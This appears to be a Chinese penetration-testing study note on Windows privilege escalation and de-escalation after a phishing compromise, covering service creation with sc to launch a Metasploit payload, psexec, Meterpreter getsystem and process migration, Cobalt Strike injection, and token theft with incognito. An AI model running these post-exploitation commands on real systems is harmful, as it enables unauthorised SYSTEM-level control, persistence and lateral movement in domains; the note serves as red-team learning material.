计算机管理员–>系统管理员(提权)
系统管理员/计算机管理员–>普通用户(降权)
应用场景:
1、常规某个机器被钓鱼后门攻击后,我们需要做更高权限操作或权限维持等。
2、内网域中某个机器被钓鱼后门攻击后,我们需要对后续内网域做安全测试。
主要当前技术入口点:
- 当前权限由钓鱼攻击获取
技术应用点:
- 当前受控机在内网域环境
1、提权system与内网交互
2、降权到域用户与内网交互
服务启动(提权)
sc是用于与服务控制管理器和服务进行通信的命令行程序。
适用版本:windows 7、10、08、12、16、19、22,早期用at命令
1、创建一个名叫syscmd的执行文件服务
sc Create syscmd binPath= "C:\Users\Administrator\Desktop\i\msf.exe"
控制端
被控端
2、运行服务
sc start syscmd
获取成功
远程控制(提权)
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
psexec.exe -accepteula -s -i -d cmd
调用运行cmd
进程注入(降权&提权)
MSF:
获取获取system权限
getsystem
ps //查看进程
migrate PID //迁移对应PID
降权同理,选择其他权限的进程注入
CS:
ps //查看进程
inject PID //注入对应PID
执行提权
没有成功,报错了
令牌窃取(降权&提权)
MSF:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
CS:
ps //查看进程
steal_token PID //窃取进程令牌
spawnu PID //窃取进程令牌上线
没有成功报错了
但是getsystem成功了
思考
为什么要提权?
- 用户可能由于权限不足,无法完成特定操作,所以需要提权
- 由于域用户受域控管理员控制,本地管理员不在域中,可能无法查看域成员,则无法进行域渗透
- system权限是本地最高权限,脱离了域控制,计算不是域成员也可以查看域成员名单
为什么要降权?
下降到某个域成员上,就可以查看域成员名单